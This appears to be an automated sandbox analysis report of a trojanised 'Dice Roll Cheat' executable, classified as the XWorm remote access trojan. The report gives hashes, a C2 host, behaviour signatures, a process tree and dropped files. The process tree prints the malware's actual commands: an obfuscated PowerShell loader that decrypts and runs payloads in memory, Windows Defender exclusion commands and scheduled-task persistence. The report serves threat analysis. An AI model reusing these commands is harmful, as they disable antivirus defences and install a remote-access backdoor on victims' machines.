Analysis

  • max time kernel
    70s
  • max time network
    71s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    14-09-2024 16:02

General

  • Target

    Dice roll advanced cheat/Dice roll advanced cheat/Dice roll advanced cheat/Dice Roll CheatV2.exe

  • Size

    23.3MB

  • MD5

    99197c50cf777691f85ff76130c29186

  • SHA1

    885a312fee977b740c1100e2091444695da7d58d

  • SHA256

    e63b97535e194d90756cc01a322550d4fa41a76117799a798ea0a78c6dd940bd

  • SHA512

    cbfd7080ddc2fd6094d0882da1e9e94c439b9fba6cf7935e45410979c24ebbab372f02e4665b226f829d1a2300965d1278957a2f24d997969f8db37e8091522f

  • SSDEEP

    393216:9XlObdJ4zYDHwWk5FqBJF/hGn7RcPR5jHnxtSKzfZgvTbbBUcfs7GOa:1lIIYDdKFqBFGuPHTxcKzfATbbBf

Malware Config

Extracted

Family

xworm

C2

distribution-between.gl.at.ply.gg:39183

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Helper.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dice roll advanced cheat\Dice roll advanced cheat\Dice roll advanced cheat\Dice Roll CheatV2.exe
    "C:\Users\Admin\AppData\Local\Temp\Dice roll advanced cheat\Dice roll advanced cheat\Dice roll advanced cheat\Dice Roll CheatV2.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "Dice Roll CheatV1.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5104
      • C:\Windows\system32\net.exe
        net file
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 file
          4⤵
            PID:4776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fYmmJNEEmwL2/i91dLAq9U/rqmkeJ1ZMYsKyNxwXrUQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ujlgrPMnGs/JAXhlzyavNw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oxTJr=New-Object System.IO.MemoryStream(,$param_var); $ZOGRX=New-Object System.IO.MemoryStream; $suIjM=New-Object System.IO.Compression.GZipStream($oxTJr, [IO.Compression.CompressionMode]::Decompress); $suIjM.CopyTo($ZOGRX); $suIjM.Dispose(); $oxTJr.Dispose(); $ZOGRX.Dispose(); $ZOGRX.ToArray();}function execute_function($param_var,$param2_var){ $OpBwG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cBpLo=$OpBwG.EntryPoint; $cBpLo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll CheatV1.bat';$YvnNY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll CheatV1.bat').Split([Environment]::NewLine);foreach ($BpHmp in $YvnNY) { if ($BpHmp.StartsWith(':: ')) { $BYdRI=$BpHmp.Substring(3); break; }}$payloads_var=[string[]]$BYdRI.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_75_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_75.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1780
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_75.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2576
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_75.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3316
              • C:\Windows\system32\net.exe
                net file
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2296
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 file
                  7⤵
                    PID:3944
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fYmmJNEEmwL2/i91dLAq9U/rqmkeJ1ZMYsKyNxwXrUQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ujlgrPMnGs/JAXhlzyavNw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oxTJr=New-Object System.IO.MemoryStream(,$param_var); $ZOGRX=New-Object System.IO.MemoryStream; $suIjM=New-Object System.IO.Compression.GZipStream($oxTJr, [IO.Compression.CompressionMode]::Decompress); $suIjM.CopyTo($ZOGRX); $suIjM.Dispose(); $oxTJr.Dispose(); $ZOGRX.Dispose(); $ZOGRX.ToArray();}function execute_function($param_var,$param2_var){ $OpBwG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cBpLo=$OpBwG.EntryPoint; $cBpLo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_75.bat';$YvnNY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_75.bat').Split([Environment]::NewLine);foreach ($BpHmp in $YvnNY) { if ($BpHmp.StartsWith(':: ')) { $BYdRI=$BpHmp.Substring(3); break; }}$payloads_var=[string[]]$BYdRI.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:692
                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe
                    "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1760
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime broker.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4740
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4356
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Runtime broker.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4180
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Runtime broker" /tr "C:\ProgramData\Runtime broker.exe"
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2472
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdwB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAZgBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYgBuAG0AIwA+AA=="
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3700
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAagB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAeQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBxACMAPgA="
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\Runtime.exe
                      "C:\Users\Admin\AppData\Local\Temp\Runtime.exe"
                      8⤵
                      • Drops startup file
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:4152
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Runtime.exe'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4556
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime.exe'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:360
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3956
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1624
                      • C:\Windows\System32\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
                        9⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5072

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        8592ba100a78835a6b94d5949e13dfc1

        SHA1

        63e901200ab9a57c7dd4c078d7f75dcd3b357020

        SHA256

        fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

        SHA512

        87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2acf991078394ddfd688acc9f6d0f39f

        SHA1

        5e2122efbe1938c9c1102778b4b1050cf0ac9a08

        SHA256

        dd812dddb2fa694ba7017e7ecfdd0853c80704042ff0946b17b76624763431d6

        SHA512

        9a7fe93f103b47f95bba9da099450f3962fbc8c011ee9e36dae21a56d64ee1d4e0f3afa6dfd7ad8a73897eeb33c428ce2fa0f1e633ac2c4d67de2b93e3e8031d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        aaf973052bba12318f887f5462c325f0

        SHA1

        555b53001a0bd549706ec8b20d355ea533ec35f8

        SHA256

        b764acf80de7c7e7302ea96f16d5bd7c2edc85fe26cdb4d36d887105f40dfec4

        SHA512

        f8b500d92c4aa5f5212b4324c4993dc8e6f3beb3be353122213bcf18a71a645a532526227a86c7ee0f4c69024756a3cf3533c5395da3b796e2638b522ee37c8b

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        789B

        MD5

        53d1bdb9ec3bf59046207c75e7ee192f

        SHA1

        5a6474ab8384dd92f002a92483ad20b60281709e

        SHA256

        4dbb8d29bcd6d4323c60616d44d2c41ba4d3c47fb63c0b2912f9bb12acc95107

        SHA512

        ac096b1f248436404abcc1f7c7b6c3af37d6fd3174ee5952bb28f79ad2f889c6c90ca78a371d38f91c388a3694525054cbab3511841af00a49e4264df7e7bf4e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        69b9917c0ffb2c2b2dcf8a5e262c44b2

        SHA1

        e486bcf57396e6eba907e1a0da3f6adc32bc01df

        SHA256

        39734ca964c07fe6a47c27959650e4478ac60acad7e0a216e1ab6d5fefb78da4

        SHA512

        06752fd2b346632f7aab310b0518882c60439580048d5a0ef6f14ff9771361e29430b4ec73c0cdece07092a03cfb82f21f366a8a2f4544ec569c535c62986e01

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        d464a6664c86732f1614f8a7cdd337cb

        SHA1

        7b28b1ca4850a0cf0300e335f1a39eea8796b20e

        SHA256

        cd8c9418039078f998c68608af26b836badd2a960e8e4311245eca2d95e7a50e

        SHA512

        25376129fa354a079e3b66c5594ee3e7b07ec50e202820a2363cb16860589a2b614e75a82edfcc72e1c8af4e5dd71c44755a90589d80ecca59a9c1379109fec7

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2c3970e4b0d575d8bf7d6db28b5ffb96

        SHA1

        7cc728b6e55f0489ef427cb503c24f4a05927b38

        SHA256

        b06bff4a9a304a3b99373801a4f5deeae99f1e761cab8b05848fe0d2cdfcd50c

        SHA512

        eaf4fc0686e16635b2ab2c82677c6c1486be16e5d59385d8c26b3abf198e8a6306a3e72d07bcfb8ba7df3d609399558f0f3b2040191d3f45f6e900f407978e74

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        511658d8b7ca56963f73c3be004a38d4

        SHA1

        8c574c3bbaf196167a5a76117832c42cf39caeb6

        SHA256

        a36a4584a4443f19bda8a886aed7a38af9e34b9098d69661177e774c9536a4fd

        SHA512

        b8caabbb7f24d9415a01f68f9394debaae21245c41ab51b70b56f071373f0dd6d9e1da11dbf38f4a8b36fe8ce6f3f2ac3128e785b2333cfadd6fc9f7f15d26dd

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        493feaa6e39a03e520e2ca446e12d87e

        SHA1

        ce8d6271c8b869f056ce8b41f991796fdc5831ed

        SHA256

        1a47c88ff31191b553aa735761cf9f6e2cdaea3ef44716210db4b786e5fd9dcf

        SHA512

        5b3f26460304eec41ae2ba37857e74793e505a4f4f2671c80acd483d37f53b9166601f16efeb2104df479522d7c64f6f580a35dcd295fac83583c9fae62f8e31

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        ffd1078057378e2c8b058571795dafc8

        SHA1

        0bca40bf286cd9dc9e1ced7290407e6881673200

        SHA256

        2260f4a788a4ea4cab4df510b94e327d54ac0131cfd86547b5ef8db09707cf76

        SHA512

        97e03f35bfc03ca041c7cc42fddc7ee728acf1a28987f5f779e5f295313a631639ff48cb5bfe580f6b570d34a4356f65bd9365220a4d070a1242ba58a6868384

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        70eb0b5bb3cf49a1a96f1ceb2b6231fb

        SHA1

        d090a3753d41b71386e40ec46a5456aab98ad984

        SHA256

        a4c6bd801743011953d9c44a0c15ee014f9813320945e3704da5f871454a81af

        SHA512

        e121c4810db73d164f46f7cd2e38d95ae57db8799df73834a1ba31274afdee0a3eba15270268ed766bddb76aa5467c11429c795ee993924fc1846338be80edc3

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll CheatV1.bat

        Filesize

        30.7MB

        MD5

        9fbbc89299dc7622d1524f2e7930dc60

        SHA1

        ceabc64269c5ed939b4261229eb416e28d4b4cdc

        SHA256

        ce76a288ef34447b2ae99d1e56cb2ad2fd3795fe3651fbd24e865d98fb59bec0

        SHA512

        ddff2feaac4f482c2dfa4b2d73b7630a266de2ffaa9f1de1c36003739a7179bd5d3140dc7b741d03b17bc8c43765ca4c821e76b9ab512e99461fb237a40fd9e9

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe

        Filesize

        108KB

        MD5

        a8866dcd94ddb4984457c1bf9f87eab6

        SHA1

        698a8100e303a49ff9c2d5be9b0adc34bc93b764

        SHA256

        190db2f6a8324d2b2392be6215261f73e77c3f4ef21fcc7aa80595650851ae3e

        SHA512

        5844f5202eb5ed31c6cd7201036dedd6255c38b524a375fce106bc57f7ddb9fa23c305aec06969e12aa90cfca33391bd35dcf343655c1255a17e17129c1f6c62

      • C:\Users\Admin\AppData\Local\Temp\Runtime.exe

        Filesize

        77KB

        MD5

        70f947112e2a87e3f3b71d47a00c5bd2

        SHA1

        de11030afe7e644fe172cba666f5054c68f3975b

        SHA256

        cc284c5da70bd76ab83dc1202239a033dbba134b950ba74648463e955509f1da

        SHA512

        6e6a310c3d2b5fdc47b2b8f7a5a1c9dfb0647bc6ff657298435983fdceda566eb9b69dded4ac9b1c363a3f54519f84afea6d172abbf40edae5fa9864f1b89090

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vb5w3a2z.xql.ps1

        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      • C:\Users\Admin\AppData\Roaming\startup_str_75.vbs

        Filesize

        114B

        MD5

        34e69de0a685a97c26fb97de1fc2cc8a

        SHA1

        ba2eb0e7078fe87022adfe3bd0ac3ca153a3ca9f

        SHA256

        4158af40bdbc3b62eb85e6f5c69cb7bfa87bc74b18855d50a1565a76074b827d

        SHA512

        320abfb0384f646b67840a15c6ddf5eff6a368683826b3a509ec70ec3778f162f90d13667312824a5782318bfd67f54f9913324da5380fa91ae2f4c2da701054

      • memory/692-130-0x000001E3B0000000-0x000001E3B1000000-memory.dmp

        Filesize

        16.0MB

      • memory/1760-262-0x000000001B6D0000-0x000000001B6EC000-memory.dmp

        Filesize

        112KB

      • memory/1760-129-0x0000000000670000-0x0000000000692000-memory.dmp

        Filesize

        136KB

      • memory/4152-272-0x0000000000620000-0x000000000063A000-memory.dmp

        Filesize

        104KB

      • memory/4152-523-0x000000001C160000-0x000000001C16C000-memory.dmp

        Filesize

        48KB

      • memory/4800-34-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-112-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-33-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-31-0x00007FF95A543000-0x00007FF95A544000-memory.dmp

        Filesize

        4KB

      • memory/4800-32-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-35-0x000001C8A0760000-0x000001C8A0768000-memory.dmp

        Filesize

        32KB

      • memory/4800-30-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-15-0x000001C8EDB10000-0x000001C8EDB86000-memory.dmp

        Filesize

        472KB

      • memory/4800-10-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-9-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

      • memory/4800-8-0x000001C8ED960000-0x000001C8ED982000-memory.dmp

        Filesize

        136KB

      • memory/4800-3-0x00007FF95A543000-0x00007FF95A544000-memory.dmp

        Filesize

        4KB

      • memory/4800-36-0x000001C898000000-0x000001C899704000-memory.dmp

        Filesize

        23.0MB